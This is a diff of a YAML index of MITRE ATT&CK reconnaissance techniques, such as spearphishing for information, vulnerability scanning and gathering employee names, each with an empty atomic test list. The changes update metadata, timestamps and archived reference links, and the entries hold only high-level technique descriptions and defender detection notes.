     atomic_tests: []
   T1592.001:
     technique:
@@ -66393,7 +67099,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:32:10.810Z'
       name: 'Gather Victim Host Information: Hardware'
       description: |-
         Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).
@@ -66411,13 +67117,11 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1592.001
     atomic_tests: []
   T1598.003:
     technique:
-      modified: '2024-04-19T13:26:16.082Z'
+      modified: '2024-05-31T04:18:44.567Z'
       name: Spearphishing Link
       description: |-
         Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -66473,7 +67177,7 @@ reconnaissance:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: TrendMictro Phishing
         description: Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved
           October 20, 2020.
@@ -66524,7 +67228,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.004:
     technique:
@@ -66545,7 +67248,7 @@ reconnaissance:
       - source_name: DNS Dumpster
         url: https://dnsdumpster.com/
         description: Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:33:02.476Z'
       name: Network Topology
       description: |-
         Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.
@@ -66561,8 +67264,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590.003:
     technique:
@@ -66584,7 +67285,7 @@ reconnaissance:
         url: https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019
         description: García, C. (2019, April 3). Pentesting Active Directory Forests.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:22.917Z'
       name: Network Trust Dependencies
       description: |-
         Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.
@@ -66600,8 +67301,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1597.001:
     technique:
@@ -66623,7 +67322,7 @@ reconnaissance:
         url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
         description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
           Intelligence Feeds. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:45:30.862Z'
       name: Threat Intel Vendors
       description: |-
         Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds)
@@ -66639,12 +67338,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589:
     technique:
-      modified: '2024-04-19T04:27:00.005Z'
+      modified: '2024-09-16T16:09:45.794Z'
       name: Gather Victim Identity Information
       description: |-
         Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, security question responses, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.
@@ -66684,8 +67381,8 @@ reconnaissance:
         external_id: T1589
       - source_name: OPM Leak
         description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
       - source_name: Detectify Slack Tokens
         description: Detectify. (2016, April 28). Slack bot token leakage exposing
           business critical information. Retrieved October 19, 2020.
@@ -66730,11 +67427,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T13:37:31.317Z'
       name: Vulnerability Scanning
       description: |-
         Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
@@ -66774,9 +67470,8 @@ reconnaissance:
         url: https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1596:
     technique:
@@ -66838,7 +67533,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1595:
     technique:
@@ -66864,7 +67558,7 @@ reconnaissance:
         url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
         description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
           October 20, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T20:58:13.661Z'
       name: Active Scanning
       description: |-
         Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -66885,8 +67579,6 @@ reconnaissance:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1589.002:
     technique:
@@ -66951,7 +67643,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1598.004:
     technique:
@@ -66999,7 +67690,6 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1590.006:
     technique:
@@ -67021,7 +67711,7 @@ reconnaissance:
         url: https://nmap.org/book/firewalls.html
         description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
           and Intrusion Detection Systems. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:31:54.275Z'
       name: Network Security Appliances
       description: |-
         Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -67037,34 +67727,10 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
-      type: attack-pattern
-      created: '2020-10-02T16:50:12.809Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1593.002
-        url: https://attack.mitre.org/techniques/T1593/002
-      - source_name: SecurityTrails Google Hacking
-        url: https://securitytrails.com/blog/google-hacking-techniques
-        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-      - source_name: ExploitDB GoogleHacking
-        url: https://www.exploit-db.com/google-hacking-database
-        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
-          October 23, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-12T19:19:47.758Z'
       name: Search Engines
       description: |-
         Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -67073,15 +67739,38 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+      created: '2020-10-02T16:50:12.809Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1593/002
+        external_id: T1593.002
+      - source_name: SecurityTrails Google Hacking
+        description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+      - source_name: ExploitDB GoogleHacking
+        description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+          October 23, 2020.
+        url: https://www.exploit-db.com/google-hacking-database
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591.002:
     technique:
@@ -67103,7 +67792,7 @@ reconnaissance:
         url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
         description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
           Personal Voicemail Transcripts. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:36:58.964Z'
       name: Business Relationships
       description: |-
         Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -67119,8 +67808,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593.003:
     technique:
@@ -67181,29 +67868,10 @@ reconnaissance:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1589.003:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
-      type: attack-pattern
-      created: '2020-10-02T14:57:15.906Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1589.003
-        url: https://attack.mitre.org/techniques/T1589/003
-      - source_name: OPM Leak
-        url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
-        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
-          Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-16T16:09:45.795Z'
       name: Employee Names
       description: |-
         Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -67212,15 +67880,34 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.0'
+      type: attack-pattern
+      id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+      created: '2020-10-02T14:57:15.906Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1589/003
+        external_id: T1589.003
+      - source_name: OPM Leak
+        description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+          Retrieved September 16, 2024.
+        url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1592.004:
     technique:
@@ -67246,7 +67933,7 @@ reconnaissance:
         url: https://threatconnect.com/blog/infrastructure-research-hunting/
         description: 'ThreatConnect. (2020, December 15). Infrastructure Research
           and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T16:35:09.668Z'
       name: Client Configurations
       description: |-
         Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -67264,47 +67951,10 @@ reconnaissance:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Internet Scan: Response Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1598.002:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Philip Winther
-      - Sebastian Salla, McAfee
-      - Robert Simmons, @MalwareUtkonos
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
-      type: attack-pattern
-      created: '2020-10-02T17:08:57.386Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1598.002
-        url: https://attack.mitre.org/techniques/T1598/002
-      - source_name: Sophos Attachment
-        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
-        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
-          links – when phishers bring along their own web pages. Retrieved October
-          20, 2020.'
-      - source_name: GitHub Phishery
-        url: https://github.com/ryhanson/phishery
-        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
-          23, 2020.
-      - source_name: Microsoft Anti Spoofing
-        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
-        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
-          Retrieved October 19, 2020.
-      - source_name: ACSC Email Spoofing
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
-        description: Australian Cyber Security Centre. (2012, December). Mitigating
-          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-05-31T04:18:44.568Z'
       name: Spearphishing Attachment
       description: |-
         Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -67313,19 +67963,55 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Philip Winther
+      - Sebastian Salla, McAfee
+      - Robert Simmons, @MalwareUtkonos
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
         accounts receiving messages from a single unusual/unknown sender. Filtering
         based on DKIM+SPF or header analysis can help detect when the email sender
         is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+      created: '2020-10-02T17:08:57.386Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1598/002
+        external_id: T1598.002
+      - source_name: ACSC Email Spoofing
+        description: Australian Cyber Security Centre. (2012, December). Mitigating
+          Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: Sophos Attachment
+        description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+          links – when phishers bring along their own web pages. Retrieved October
+          20, 2020.'
+        url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+      - source_name: Microsoft Anti Spoofing
+        description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+          Retrieved October 19, 2020.
+        url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+      - source_name: GitHub Phishery
+        description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+          23, 2020.
+        url: https://github.com/ryhanson/phishery
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1596.004:
     technique:
@@ -67348,7 +68034,7 @@ reconnaissance:
         description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
           Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
           You Can Do About It. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:47:55.905Z'
       name: CDNs
       description: |-
         Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -67364,8 +68050,6 @@ reconnaissance:
       x_mitre_is_subtechnique: true
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1591:
     technique:
@@ -67391,7 +68075,7 @@ reconnaissance:
         url: https://www.sec.gov/edgar/search-and-access
         description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
           27, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-27T15:37:09.343Z'
       name: Gather Victim Org Information
       description: |-
         Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -67407,8 +68091,6 @@ reconnaissance:
       x_mitre_version: '1.1'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1590:
     technique:
@@ -67436,7 +68118,7 @@ reconnaissance:
         url: https://www.circl.lu/services/passive-dns/
         description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
           Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-04-15T03:34:23.229Z'
       name: Gather Victim Network Information
       description: |-
         Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -67452,12 +68134,10 @@ reconnaissance:
       x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1593:
     technique:
-      modified: '2022-10-18T22:48:33.286Z'
+      modified: '2024-09-12T19:19:47.759Z'
       name: Search Open Websites/Domains
       description: |-
         Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -67466,16 +68146,16 @@ reconnaissance:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_platforms:
-      - PRE
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - PRE
       x_mitre_version: '1.1'
       type: attack-pattern
       id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -67488,8 +68168,8 @@ reconnaissance:
         external_id: T1593
       - source_name: SecurityTrails Google Hacking
         description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
-          Retrieved October 20, 2020.
-        url: https://securitytrails.com/blog/google-hacking-techniques
+          Retrieved September 12, 2024.
+        url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
       - source_name: Cyware Social Media
         description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
           Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -67500,52 +68180,50 @@ reconnaissance:
         url: https://www.exploit-db.com/google-hacking-database
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1597:
     technique:
-      x_mitre_platforms:
-      - PRE
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
-      type: attack-pattern
-      created: '2020-10-02T17:01:42.558Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1597
-        url: https://attack.mitre.org/techniques/T1597
-      - source_name: D3Secutrity CTI Feeds
-        url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
-        description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
-          Intelligence Feeds. Retrieved October 20, 2020.
-      - source_name: ZDNET Selling Data
-        url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
-        description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
-          73 million user records on the dark web. Retrieved October 20, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-04T13:12:14.469Z'
       name: Search Closed Sources
       description: |-
-        Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+        Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
 
         Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: reconnaissance
+      x_mitre_contributors:
+      - Barbara Louis-Sidney (OWN-CERT)
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
 
         Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_platforms:
+      - PRE
+      x_mitre_version: '1.1'
+      type: attack-pattern
+      id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
